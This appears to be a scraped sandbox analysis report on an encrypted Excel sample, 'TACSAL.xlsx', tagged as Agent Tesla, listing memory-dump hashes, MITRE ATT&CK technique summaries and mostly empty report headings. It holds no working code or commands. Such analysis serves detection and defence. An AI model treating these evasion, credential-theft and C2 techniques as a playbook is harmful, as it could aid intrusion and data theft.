Source File: 00000005.00000002.2370655880.0000000000700000.00000040.00000001.sdmp, Offset: 00700000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9edfff5d9d7fe2d906fc93be6f5fbf2793a67206fbb5592b91d46a3fdd059bd
Instruction ID: 181f5520238070da7ca1c1beea8a61af5fa8aa380a36d9f6b7dd522ca54a969d
Opcode Fuzzy Hash: e9edfff5d9d7fe2d906fc93be6f5fbf2793a67206fbb5592b91d46a3fdd059bd
Instruction Fuzzy Hash: 2DE06536B00129AF8F01EBF8E8059EDB3F5AF88624B108022E109E7295DF389C069B51

Uniqueness

Uniqueness Score: -1.00%

Function 00842308, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370742887.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041d1d0ac9e0277b22e1e95fa8d7b21b937a2816e47cec11eb3b54d0cabf299b
Instruction ID: dc3692d1630637b9ff21077611288843edfe6d12ccb69cce7033941cae83c202
Opcode Fuzzy Hash: 041d1d0ac9e0277b22e1e95fa8d7b21b937a2816e47cec11eb3b54d0cabf299b
Instruction Fuzzy Hash: 27C0123916420C83D604BBD4F410E94330DC784708F814D35871407159DF99685625A5

Uniqueness

Uniqueness Score: -1.00%

Function 00844EB0, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2370742887.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64102ae89436bfcda58ad8b050675d63df3777069277e267a976a9d4bf23d97b
Instruction ID: 3f62efebf692fd676a77e659675aad6b055497e70d10de3b05a56e0dd68e7700
Opcode Fuzzy Hash: 64102ae89436bfcda58ad8b050675d63df3777069277e267a976a9d4bf23d97b
Instruction Fuzzy Hash: 54C0122094E2C11EC3028B200C788902F362E8320878E00FE88C08B0A3D19A502AE322

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report TACSAL.xlsx

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "TACSAL.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre